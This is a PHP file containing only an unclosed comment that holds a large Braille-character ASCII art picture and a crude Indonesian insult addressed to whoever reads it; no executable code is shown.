<?php
/*  ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣠⣤⣤⣔⣶⣶⣶⣶⣿⣿⣿⡿⠿⢿⣿⣿⣿⡻⠛⠛⢯⣿⣿⣿⠛⠉⠻⣿⣿⣿⡻⠛⠛⢿⣿⣿⡿⡿⠿⢿⣿⣿⣿⣶⣶⣶⣶⣦⣤⣤⣄⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣰⣶⣾⣿⣟⠟⠛⠻⣿⣿⣻⠏⠀⠀⢹⣟⣯⣯⠀⠀⠀⣿⣿⣽⡅⠀⠀⢸⣿⣯⣿⡀⠀⢀⣿⣽⣿⣇⠀⠀⢨⣿⣯⢿⠀⠀⠀⣿⣻⡽⡏⠀⠀⢹⣿⣿⣟⠟⠛⠻⣿⣿⣷⣶⣦⣤⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠟⠛⢻⣿⣿⣿⠀⠀⢀⣿⣿⣽⣧⣄⣠⣾⣟⣿⣽⣷⣶⣾⣿⣿⣏⣾⣷⣾⣯⣽⢿⣯⢿⡿⣿⢿⡿⣯⣿⣷⣾⣿⣟⣯⣿⣷⣶⣾⣟⣯⣿⢷⣄⣠⣼⣿⣻⣿⡀⠀⠀⣿⣿⣞⡹⠚⠓⢏⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣧⠀⠀⢀⣿⡿⣯⣿⣶⣿⡯⢿⡿⣞⣻⣛⡽⣫⡽⣭⢯⣝⣶⣱⢦⣏⣷⣚⣶⢳⣖⣶⣜⣶⢳⣜⣶⣲⣳⣞⣼⣷⡳⣞⣴⣒⣦⢣⡽⣭⣏⣯⣻⣿⣿⣿⣿⣿⣷⣿⣶⣿⣟⣷⢯⣇⠀⠀⢨⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣾⣿⣿⣿⣟⣿⣿⣿⣽⣷⣻⣷⣻⡾⠝⠓⠻⣯⣿⣞⣷⠟⠉⠉⠀⠀⠈⣹⡇⠀⠀⣿⡟⠀⠀⢠⡞⠀⠀⠉⠉⠙⠺⣿⣾⡿⠛⠋⠛⠛⢿⣿⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣻⢾⣯⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡿⠛⠻⢯⣿⣿⣿⣿⣿⡇⠀⠀⣿⣿⣿⠀⠀⠀⠀⢿⣿⣿⠀⠀⠀⣠⣶⣦⣄⣿⡅⠀⠀⣟⠀⠀⣰⣿⡇⠀⠀⣠⣤⠀⠀⣼⡏⠀⢀⢠⣄⡀⠀⢘⣿⠀⠀⠀⠉⠉⠙⠛⣿⣿⣿⣷⠟⠛⢯⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀⢸⣿⣿⣿⣿⣿⡇⠀⠀⣿⣿⠇⠀⣸⡆⠀⠘⣿⡟⠀⠀⢰⣿⣿⣿⣿⣿⡆⠀⠀⠏⢠⣶⣿⣿⡇⠀⠀⢿⡿⠀⠀⣿⠀⠀⣬⣿⣿⣷⠀⠈⣿⣷⣶⠀⠀⠀⣤⣄⣿⣿⣿⣧⠀⠀⠀⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣷⣶⣿⣿⣿⣿⣿⣿⡇⠀⠀⣿⡿⠀⠀⣻⣷⠀⠀⢿⡇⠀⠀⢸⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠹⣿⣿⡇⠀⠀⠀⠀⠀⢀⣽⠀⠀⣿⣿⣿⣿⠆⠀⠙⣿⣿⠀⠀⠀⣿⣿⣿⣿⣿⣿⣷⣶⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡿⠟⠿⣿⣿⣿⣿⣿⣿⡇⠀⠀⣿⠇⠀⠀⠀⠀⠀⠀⠈⣿⠀⠀⠈⢿⣿⣿⡿⣿⡇⠀⠀⣆⠀⠀⢻⣿⣗⠀⠀⢰⣴⣶⣿⣿⡄⠀⠀⢿⣿⡿⠀⠀⢰⣿⣿⠀⠀⠀⣿⣿⣿⣿⣿⣿⠾⠻⢽⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀⢸⣿⣿⣿⠀⠀⠀⠀⠀⡟⠀⢀⣰⣶⣶⣧⠀⠀⠘⣧⠀⠀⠀⠀⠀⠀⢹⡇⠀⠀⣿⣆⠀⠀⠹⡇⠀⠀⣸⣿⣿⣿⣿⣷⡀⡀⠀⠉⠁⠀⢠⣾⣿⣿⠀⠀⠀⣿⣿⣿⣿⣿⣏⠀⠀⠀⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣶⣶⣿⣿⣿⣿⣧⣤⣤⣶⣿⣧⣤⣭⣿⣿⣿⣿⣶⣦⣴⣿⣿⣶⣤⣤⣤⣾⣾⣷⣶⣤⣿⣿⣶⣶⣬⣼⣶⣮⣽⣿⣿⣿⣿⣿⣿⣾⣤⣤⣴⣾⣿⣿⣿⣿⣦⣶⣶⣿⣿⣿⣿⣿⣿⢷⣶⣾⣿⡇⠀⠀⠀⠀⠀⠀⠀⣴⣾⣿⡿⢶⡄⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣤⣤⣤⣛⣻⣟⣛⣛⣛⣛⣻⣟⣛⣛⣛⣛⣻⣟⣛⣛⣛⣛⣛⣛⣛⣛⣟⣛⣛⣻⣛⣛⣻⣛⣟⣻⣛⣛⣛⣻⣛⣻⣛⣛⣛⣛⣛⣛⣛⣛⣛⣛⣛⣛⣛⣛⣻⣛⣻⣟⣻⣻⣿⣻⣿⣛⣟⣛⡛⣞⣛⢻⣙⣿⣧⣤⣤⣤⡀⠀⠀⣼⣿⣿⣿⣷⣼⣿⡆
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⡿⠋⠉⠙⣿⣿⡟⠁⠀⠙⣿⣿⣿⠋⠀⠈⢻⣿⣿⠏⠁⠈⢻⣿⣿⡞⠁⠀⠹⣟⡿⡟⠉⠀⠙⣿⡿⣿⠉⠀⠉⣿⢯⣻⠊⠀⠈⢫⣝⣣⠏⠁⠈⢹⣻⣟⡟⠁⠈⠹⣿⣿⡟⠁⠀⠙⣿⡽⣲⠊⠀⠈⢲⢯⣷⡟⠉⠉⢻⣿⠀⠀⠹⣿⣿⣿⣿⣿⡿⠁
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢘⣷⣀⠀⣠⣿⣾⣷⣄⣀⣴⣿⣿⣟⣦⣀⣠⣾⣿⣿⣧⣀⣀⣼⣿⣟⢣⣄⣀⣔⢿⣟⣷⣄⣀⣴⣿⣻⣟⣄⣀⣠⠿⣯⡽⣦⣀⣠⡾⣜⢶⣣⣀⣀⣼⣳⣯⣷⣀⣀⣼⣿⡿⣷⣄⣀⣴⣿⣻⣍⢢⣀⣠⢚⣿⡿⣆⡀⣀⣼⣿⠀⠀⠀⠈⣻⠻⠛⠋⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢨⣿⣿⣿⣿⣻⣷⣿⡿⣿⡿⣿⢿⡿⣿⢿⡿⣿⢯⡿⢿⢿⡿⢿⠿⢾⠿⡿⢿⠿⡾⠽⠿⡽⠿⢯⠿⡽⢾⠿⡿⢿⠿⠿⠽⠷⠯⠷⠿⠽⠾⠧⠿⠽⠷⢯⠿⠿⠿⡿⠿⠿⡽⠿⢿⠿⢿⠾⠷⠽⢯⠾⣽⢷⣞⣻⣽⣿⣿⣿⣿⠀⠀⠀⢠⠿⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣯⡷⠿⢯⣟⣿⣷⣿⣳⣿⣽⣳⣟⣾⣳⢿⣼⣳⡽⣯⣞⡽⣎⡿⣭⢷⣫⡽⣮⡽⣹⢮⡵⣛⢮⡳⣝⣎⢷⣙⢮⡝⣎⡳⣍⢶⡹⣜⡧⣛⣬⢣⡞⣱⢎⡞⣭⢳⣜⣹⣎⣵⣯⣾⣾⣷⣿⣿⣿⣯⣿⣭⣿⣿⡿⣽⠟⠿⣳⣿⠀⠀⠀⡿⠇⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣏⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣻⣭⣿⣭⣿⣭⣽⣭⣽⣭⣽⣭⣿⣭⣯⣽⣯⣽⣭⣽⣯⣽⣭⣯⣭⣽⣬⣯⣭⣯⣭⣿⣭⣿⣭⣿⣼⣿⣽⣭⣽⣯⣽⣯⣽⣭⣭⣭⣭⣭⣽⣭⣿⣽⣿⣿⣿⣿⣿⣿⣿⣿⣯⢿⡁⠀⠀⢸⣿⠀⠀⣼⠻⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢘⣿⣷⣶⣾⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣷⣿⣿⣿⣿⣿⣿⣿⣿⣻⣶⣶⣿⣿⣀⣀⡏⠇⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢨⣿⣿⣿⣿⣻⣽⣿⣿⣿⣿⣿⣿⣿⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣿⢷⣛⣾⣳⣿⡟⣼⢸⡇⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡷⠁⠀⠙⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠻⣿⣿⣷⣿⣿⡿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠻⣿⣿⣿⣽⣿⠟⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠻⣿⣿⣿⣯⣿⣿⣿⣿⣿⣿⡗⣯⠏⠀⠈⢳⣿⣧⣇⣿⣧⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣄⣀⣠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣻⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣽⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⡿⣿⣿⣿⣿⣿⣿⣏⣿⣦⣀⣀⣼⣿⣻⢿⣿⣿⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣯⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣽⣿⣯⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡗⣿⣞⣯⢿⣽⣿⣿⣻⢿⣿⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢨⣟⡮⠷⢽⣞⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⢿⣿⣿⣿⣿⣿⡏⣿⣹⠮⠿⢎⣿⣾⢯⣿⣿⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠰⣏⠀⠀⠀⣟⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⣿⡁⠀⠀⢸⣿⣽⣻⣞⣿⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢘⣯⡷⣖⡾⣯⣿⣿⣿⣿⣿⣿⣿⣿⣾⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣟⣿⣿⣿⣿⣿⣿⡟⣷⣯⣖⣶⣽⣻⢾⣵⣫⣿⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣟⣿⡿⣿⣿⣿⣿⣿⣿⣿⣿⢿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣏⣿⣷⣿⣷⡿⣿⣻⢶⣭⣿⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡷⠋⠉⠙⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣏⣿⠝⠉⠉⢻⣿⣯⣟⡾⡍⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣷⣀⠀⣠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣻⣿⣿⣷⣷⣿⣷⣯⣿⣽⣷⣻⣧⣿⣾⣿⣿⣿⣾⣿⣷⣷⣾⣟⣷⣯⣿⣽⣮⣿⣞⣾⣽⣿⣿⣿⣿⣿⣷⣷⣾⣯⣾⣽⣯⣷⣿⣳⣾⣞⣿⣿⣿⣿⣻⣿⣿⣿⣿⣿⣿⣿⣆⡀⢀⣼⣿⣷⣯⣿⠇⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⣟⣿⢿⣻⣿⣻⢿⣟⡿⣟⣿⢿⣿⣿⣽⣿⣿⢿⣟⣿⢿⣟⡿⣿⣻⢿⣿⣻⢿⣿⣿⣿⣿⣿⡿⣿⣻⡿⣿⣻⢿⣻⡿⣟⣿⢿⡿⣿⣿⡿⣿⣿⣿⣿⣿⣿⣇⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣯⠷⠿⢞⡿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣿⣯⣿⣿⣾⣿⣽⣾⣽⣿⣾⣽⣿⣾⣿⣿⣿⢿⣿⣽⣯⣿⣾⣯⣿⣽⣷⣯⣿⣾⣽⣿⣾⣿⣿⢿⣯⣿⣿⣽⣿⣷⣿⣯⣷⣿⣽⣾⣯⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣏⣿⣿⠾⠽⣟⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣏⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣽⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣟⣿⣿⣿⣿⣿⣿⣻⣿⣟⣿⣿⣿⣿⣿⣿⣿⣟⣯⣿⣿⣿⣿⣿⣿⣿⣇⣿⡁⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣟⣷⣶⡾⣟⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣿⣿⣶⣶⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⢻⠷⣯⢿⢻⣟⣿⢿⡿⣿⣿⣿⣿⣿⣿⣿⣿⣻⣿⣿⣿⣿⣿⣿⣻⣿⣿⣿⣿⣿⣻⣟⣛⣟⣻⣿⣿⣟⣿⣻⣿⣿⣿⣻⣿⣻⣿⣟⣛⣻⣿⣻⣿⣿⣛⣻⣿⣿⣟⣿⣿⣻⣿⣿⣿⣿⣿⣿⣻⣟⣻⣟⣻⣷⢿⣻⣷⣿⣟⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡳⠉⠀⠁⡾⣝⡾⠋⠉⠳⣯⣿⣷⠟⠉⠉⢿⣿⣿⠟⠉⠉⢻⣿⣿⡝⠉⠉⠻⣽⡿⡽⠋⠉⠹⣷⣿⣿⠋⠉⠙⣿⣿⣻⠟⠉⠙⢿⣿⣳⠜⠉⠉⢲⡿⣿⡟⠉⠉⢻⣿⣿⡿⠉⠉⠻⣿⣽⣻⠞⠉⠙⢟⡿⣯⠏⠁⠈⢻⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡓⣄⣀⣠⢻⣽⢧⡀⠀⣠⣿⣯⣿⣄⡀⢀⣼⣿⣿⣆⡀⢀⣼⣿⣿⢧⡀⢀⣰⣿⣟⣧⡀⠀⣠⣿⢾⣿⣀⠀⣀⣿⣿⣽⣄⠀⢀⣼⣷⡟⢆⡀⢀⠼⣿⣟⣧⡀⢀⣸⣿⣿⢧⡀⠀⣠⣿⣷⣻⣄⠀⢀⣼⢿⣟⣧⣀⣀⣼⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⢿⣿⣿⣷⠿⠿⠿⠿⠿⠷⠿⠷⠿⣿⣿⣿⠿⠿⠿⠿⠿⠿⠿⠯⠿⣿⣿⡿⠯⠿⠾⠿⠿⠿⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣼⣿⣿⣿⣷⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⠿⣷⢿⣿⣿⣯⣿⣾⣽⣿⣿⠟⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⣿⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣿⣿⣿⣿⣥⣤⣤⣤⣤⣤⣤⣤⣤⣤⣼⣿⣿⣯⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣿⣿⣿⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣾⣾⣿⣯⣽⣭⣿⣿⣿⣿⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣿⣛⣟⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣟⣻⣟⣻⣛⣿⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣿⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣛⣟⣻⣳⡄⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⠟⠻⠿⠿⠿⢿⣿⣿⣿⡿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⠿⠿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣿⠿⠿⠿⠟⠻⠻⠃⠀⠀⠀


                                                                        |  YANG BACA KONTOL  |
